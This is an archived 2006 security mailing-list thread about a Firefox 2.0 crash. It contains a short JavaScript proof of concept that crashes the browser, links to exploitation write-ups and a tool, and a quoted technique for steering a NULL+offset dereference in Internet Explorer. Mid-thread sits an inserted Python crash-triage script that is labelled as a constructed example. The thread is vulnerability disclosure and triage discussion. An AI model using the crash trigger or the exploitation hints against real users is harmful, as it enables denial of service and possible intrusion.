Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
Also crashes Seamonkey 1.1b on Suse 10.1

> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
> function do_crash()
> {
>     var range;
>
>     range = document.createRange();
>     range.selectNode(document.firstChild);
>     range.createContextualFragment('<span></span>');
> }
>
> Good bye Firefox!

--
"A Heart for Children" - Your donation helps! Campaign: www.deutschlandsegelt.de
Our thank-you: your name on the sail of the first German America's Cup yacht!
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
[EMAIL PROTECTED] wrote:
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
> function do_crash()
> {
>     var range;
>
>     range = document.createRange();
>     range.selectNode(document.firstChild);
>     range.createContextualFragment('<span></span>');
> }
>
> Good bye Firefox!

hi!

that works also under firefox v1.5.0.7.

regards
jan
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
3APA3A wrote:
> Dear [EMAIL PROTECTED],
>
> NULL pointer dereference is not exploitable to code execution by itself.

Hi,

you should be interested in this
http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html
+ a little tool
https://www.securinfos.info/outils-securite-hacking/uSEH.rar

/JA
Re[2]: New Flaw in Firefox 2.0: DoS and possible remote code execution
Dear Jerome Athias,

I said a NULL pointer is not exploitable _by itself_. The ability to control the unhandled exception filter is a different vulnerability. The NULL pointer in this case is not the exploitation vector; it is only used to initiate the attack.

--Thursday, November 2, 2006, 10:01:19 PM, you wrote to [EMAIL PROTECTED]:

JA> 3APA3A wrote:
>> Dear [EMAIL PROTECTED],
>>
>> NULL pointer dereference is not exploitable to code execution by itself.
>>
JA> Hi,
JA> you should be interested in this
JA> http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html
JA> + a little tool
JA> https://www.securinfos.info/outils-securite-hacking/uSEH.rar
JA> /JA

--
~/ZARAZA
Trouble will begin at eight. (Twain)
Re[3]: New Flaw in Firefox 2.0: DoS and possible remote code execution
Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself. Please read carefully the original Michal Zalewski post on the issue you are pointing to, http://securitytracker.com/alerts/2006/Apr/1016001.html. The issue mentioned is not a NULL pointer, but a NULL+offset dereference where the offset is believed to be controlled:

-=-=-=-=- start quote Michal Zalewski =-=-=-=-
...this will (usually) cause a NULL pointer + fixed offset (eax+0x28) dereference in mshtml.dll, the pointer being read from an allocated but still zeroed memory region. The aforementioned condition is not exploitable, but padding the page with a preceding OBJECT tag (and other tags), increasing the number of nested OBJECTs, and most importantly, adding bogus 'type=' parameters of various length to the final sequence of OBJECTs, will cause that dereference to become non-NULL on many installations;
-=-=-=-=- end quote =-=-=-=-

--Tuesday, October 31, 2006, 11:00:00 PM, you wrote to bugtraq@securityfocus.com:

xgc> When you have a NULL pointer dereference a code execution is
xgc> also possible, so you can't exclude it at all.
xgc> For example in this old flaw:
xgc> http://securitytracker.com/alerts/2006/Apr/1016001.html
xgc> "The browser does not properly process certain combinations
xgc> of nested OBJECT tags. A remote user can create specially crafted
xgc> HTML that, when loaded by the target user, will trigger a NULL
xgc> pointer dereference and cause the target user's browser to crash or
xgc> execute arbitrary code."

--
~/ZARAZA
http://www.security.nnov.ru/
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
[EMAIL PROTECTED] wrote:
> When you have a NULL pointer dereference a code execution is also possible,
> so you can't exclude it at all.
> For example in this old flaw:
> http://securitytracker.com/alerts/2006/Apr/1016001.html

In that example there was a way to influence the crash so that it was not null. The Metasploit blog previously reported on a way to use a null dereference crash to trigger a vulnerability in the Windows SEH to run code (since fixed, and not exploitable via Firefox as far as anyone can tell). Neither of those conditions applies here; it's just a null dereference. In a debug build you get

###!!! ASSERTION: Parsing didn't create a parser context?: 'mParserContext', file c:/dev/ff2/mozilla/parser/htmlparser/src/nsParser.cpp, line 1882

This bug appears to have been fixed in the code that will become Firefox 3. This crash is being tracked at https://bugzilla.mozilla.org/show_bug.cgi?id=358797
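The distinction drawn in 3APA3A's reply and in the post above (a fault that lands inside the NULL page versus a base pointer that moves with the input, as in Zalewski's eax+0x28 case) is the first thing a crash triager checks. The script below is an added example, not code from this thread, from Mozilla or from Metasploit; the crash lines, the 64 KiB NULL-region threshold and the 0x28 offset it uses are constructed assumptions modelled on the quoted description.

```python
"""Crash-triage helper: is a faulting access a plain NULL-page dereference,
or does the base pointer vary with input (the NULL+offset case)?"""
import re

# Assumption: the lowest 64 KiB of the address space is never mapped on the
# platforms of interest (Windows user mode reserves it; Linux mmap_min_addr
# is commonly set to the same value). Anything below this is a guaranteed crash
# and nothing more, because no attacker-controlled data can live there.
NULL_REGION_END = 0x10000

# Matches the faulting address in debugger-style lines such as
# "Access violation reading 0x00000028" (constructed format, not a real tool's).
FAULT_RE = re.compile(r"\b(?:reading|writing)\s+(?:address\s+)?0x([0-9a-fA-F]+)")


def parse_fault_address(line):
    """Return the faulting address from one crash line, or None if absent."""
    m = FAULT_RE.search(line)
    return int(m.group(1), 16) if m else None


def classify_fault(addr):
    """Classify a single faulting address by where it falls."""
    if addr is None:
        return "no-fault-address"
    if addr < NULL_REGION_END:
        # NULL, or NULL plus a small fixed field offset: denial of service only.
        return "null-page-deref"
    # The base was something other than zero: needs real analysis.
    return "mapped-range-investigate"


def base_is_input_dependent(addrs, offset):
    """Given fault addresses from several runs of the same test case with
    different padding, and the fixed offset the faulting instruction adds
    (0x28 in the quoted mshtml description), report whether the base pointer
    ever left the NULL page. A base that moves with input is the signal that
    'not exploitable by itself' no longer holds and the case must be escalated."""
    bases = [a - offset for a in addrs if a is not None and a >= offset]
    return any(b >= NULL_REGION_END for b in bases)


# Constructed sample lines; not output from Firefox, mshtml or any debugger.
SAMPLE_RUNS = [
    "run1 (no padding): Access violation reading 0x00000028",
    "run2 (3 nested OBJECT): Access violation reading 0x00000028",
    "run3 (long type= padding): Access violation reading 0x0d2a0028",
]


def triage(lines, offset=0x28):
    """Classify each run and say whether the base pointer is input-dependent."""
    addrs = [parse_fault_address(line) for line in lines]
    return {
        "per_run": [classify_fault(a) for a in addrs],
        "base_varies": base_is_input_dependent(addrs, offset),
    }


if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_RUNS, triage(SAMPLE_RUNS)["per_run"]):
        print(f"{verdict:26} {line}")
    print("base pointer varies with input:", triage(SAMPLE_RUNS)["base_varies"])
```

Run against a single crash the helper only says "NULL page"; the useful verdict comes from feeding it the same test case under several paddings, which is exactly the experiment Zalewski describes and the one a triager should repeat before labelling a crash as DoS-only.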
Re: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
When you have a NULL pointer dereference a code execution is also possible, so you can't exclude it at all.

For example in this old flaw:
http://securitytracker.com/alerts/2006/Apr/1016001.html

"The browser does not properly process certain combinations of nested OBJECT tags. A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a NULL pointer dereference and cause the target user's browser to crash or execute arbitrary code."
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>

This looks like a NULL pointer dereference in my debugger. Do you have evidence to call this remote code execution?

--
JB
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
Firefox 1.5.0.7 is also vulnerable (to DoS at least).

On Tue, 2006-10-31 at 09:24 +, [EMAIL PROTECTED] wrote:
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
> function do_crash()
> {
>     var range;
>
>     range = document.createRange();
>     range.selectNode(document.firstChild);
>     range.createContextualFragment('<span></span>');
> }
>
> Good bye Firefox!
New Flaw in Firefox 2.0: DoS and possible remote code execution
New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm

    function do_crash()
    {
        var range;

        range = document.createRange();
        range.selectNode(document.firstChild);
        range.createContextualFragment('<span></span>');
    }

Good bye Firefox!